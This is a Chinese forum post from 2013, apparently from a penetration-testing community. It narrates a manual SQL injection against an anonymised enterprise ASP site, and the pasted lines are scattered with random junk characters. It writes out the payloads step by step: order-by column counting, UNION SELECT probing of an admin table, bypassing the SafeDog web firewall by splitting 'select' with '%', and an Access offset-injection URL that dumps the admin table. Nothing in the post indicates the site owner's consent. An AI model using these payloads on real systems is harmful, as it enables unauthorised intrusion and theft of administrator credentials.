中国网络渗透测试联盟
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
[打印本页]
作者:
admin
时间:
2013-3-8 21:49
标题:
一次手工渗透突破安全狗防御+ACCESS偏移注入
打开网站,一个企业站。
) i! x5 U# Z5 M& x. A2 v7 V
. m$ O5 V& i8 x- w
5 t- \0 h' p3 y. B1 b& |
顺手加个admin
& X, T: Z4 _6 t$ w, h
1 S& d% x8 n. k4 Z& {
4 K! b/ |) Y$ E& b- x0 l
默认后台。
; f8 \/ |5 b: V8 P' a: P
回到首页点开个产点连接在参数后面加上:and 1=1,发现有狗。
# }3 g& {4 O3 R
' t8 \* z, M! E7 O0 ?- q" {6 z
) F# J! t( \* m
3 ^1 U* c% H! d( B
所以就不用御剑扫了,待会直接封IP。
/ [) e8 H9 ~4 M% a
y/ H4 R% Y) _" i X+ ]
用order by语句判断是否存在注入。
3 _6 \$ @+ {% z8 t) M
http://www.xxx.com
/product_show.asp?id=997 order by 1
^. |( B) o" r9 G, d0 V
http://www.xxx.com
/product_show.asp?id=997 order by 100
: ^; M( C$ l k: u& ?0 O
现在存在注入,经测试后发现是9个字段。
7 Y6 N9 U) K/ N& D
2 _! t0 @0 j' \/ h+ [( b, P2 [$ X
接下来进行联合查询,猜是否存在admin表。
1 @ D9 b) f% m
http://www.xxx.com
/product_show.asp?id=997+union+select+1,2,3,4,5,6,7,8+from+admin 被狗拦截。
% F0 G1 [6 O6 P
% T+ v6 F) s/ H
( g9 e3 S# R9 N* F
+ k0 f) }0 D4 C+ \) U0 w6 K# B
在select中间加个%,se%lect绕过安全狗。
, l* } d8 ?+ F; g. U/ a
2 q) L- J' U( v2 u
, G2 H4 z" f; P: S/ T5 k
发现存在admin表,然后开始手工猜常用的字段。
$ W @2 S" S. f4 M, I6 a6 @6 y
纠结的是手工把常用的字段都猜遍了,也没猜到一个字段。陷入迷茫中。
1 h5 Y% t& s5 Z: P) Z
4 ^9 a; ~1 k% o, P1 I0 g
突然想起之前看到的一篇关于access偏移注入的文章,文章就是说在注入猜不到字段时可以尝试一下这个方法,之前我特地去测试过这种方法,但是爆不出来,也没太在意。现在也只能试一下这种方法,拼一下人品了。
2 C& _, D5 E/ R1 q a
/ M; b% F) V" y. r1 g
科普知识就不讲了,如果有不懂的可以加我Q:519582321 一起交流,有深圳的基友也可以加一起搞基情。
1 `' m, f& S7 B7 H0 A
http://www.xxx.com
/product_show.asp?id=997+union+s%elect+1,2,3,4,5,* from+admin
1 S* ^9 N! p8 C( I
好了,敏感内容出显了。
z3 f: ]% I5 w' w! U
' _3 ] o$ ^9 O. A% j& a
. ]% X& y7 m; V. l5 ~- J! S
3 W' i; [6 z( l Z
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2